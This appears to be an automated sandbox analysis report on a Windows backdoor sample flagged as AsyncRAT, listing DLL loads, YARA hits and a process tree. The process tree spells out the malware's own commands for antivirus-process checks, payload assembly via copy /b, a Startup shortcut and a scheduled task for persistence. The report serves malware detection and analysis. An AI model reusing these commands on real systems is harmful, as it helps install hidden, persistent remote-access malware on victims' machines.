Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Section loaded: wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Uses 32bit PE files

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Settings.cs	Base64 encoded string: 'WoieiM17y6hiwAG51+gFJibH8QhJepoH6MP9Li0m/nZYnrk/uL9hbjsVv3vIncrn'

Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@46/20@1/1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B41FA GetLastError,FormatMessageW,

11_2_004B41FA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040350A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_004A2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004A1A0B AdjustTokenPrivileges,CloseHandle,	11_2_004A1A0B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404967

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

11_2_004ADD87

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004B3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

11_2_004B3A0E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Commander

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\0vyG14tDobaS6ejo

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user~1\AppData\Local\Temp\nskE4D4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe "C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1068
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & echo URL="C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static file information: File size 10515536 > 1048576

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
